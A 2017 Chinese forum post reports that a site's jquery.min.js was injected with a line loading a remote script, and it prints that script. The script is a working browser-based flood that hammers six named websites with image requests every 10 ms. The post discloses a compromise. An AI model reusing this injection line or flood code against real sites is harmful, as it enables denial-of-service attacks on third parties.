本帖最后由 moutleAn 于 2017-10-9 11:47 编辑
/template/fblife_moudel_new/style/js/jquery.min.js
加载这个JS的时候 最后一句被人加上了
document.write("<script src='http://bbs.081868.com/static/js/dcdc.js'></script>");
这个JS又访问了其他几个无辜的站点,等于论坛的坛友被当了炮灰去打他们的网站。。。
网站的 论坛的电话 一个都打不通 真是坑坑坑
下面这个是恶意脚本的内容
function imgflood() {
var TARGET = 'www.hnbc123.com'
var URI = '/forum.php?sbsbsbsbsb'
var pic = new Image()
var rand = Math.floor(Math.random() * 1000)
pic.src = 'http://'+TARGET+URI+rand+'=val'
}
setInterval(imgflood, 10)
function imgflood1() {
var TARGET = 'www.huaclub.cc'
var URI = '/forum.php?fuwuqibeiruqin'
var pic = new Image()
var rand = Math.floor(Math.random() * 1000)
pic.src = 'http://'+TARGET+URI+rand+'=val'
}
setInterval(imgflood1, 10)
function imgflooda() {
var TARGET = 'www.taojiu.cc'
var URI = '/read.php?fuwuqibeiruqin'
var pic = new Image()
var rand = Math.floor(Math.random() * 1000)
pic.src = 'http://'+TARGET+URI+rand+'=val'
}
setInterval(imgflooda, 10)
function imgfloodb() {
var TARGET = 'bbs.52fx.cn'
var URI = '/forum.php?fuwuqibeiruqin'
var pic = new Image()
var rand = Math.floor(Math.random() * 1000)
pic.src = 'http://'+TARGET+URI+rand+'=val'
}
setInterval(imgfloodb, 10)
function imgfloodc() {
var TARGET = 'www.edaceo.com'
var URI = '/forum.php?fuwuqibeiruqin'
var pic = new Image()
var rand = Math.floor(Math.random() * 1000)
pic.src = 'http://'+TARGET+URI+rand+'=val'
}
setInterval(imgfloodc, 10)
function imgfloodd() {
var TARGET = 'www.windfone.com'
var URI = '/goods.php?fuwuqibeiruqin'
var pic = new Image()
var rand = Math.floor(Math.random() * 1000)
pic.src = 'http://'+TARGET+URI+rand+'=val'
}
setInterval(imgfloodd, 10)
|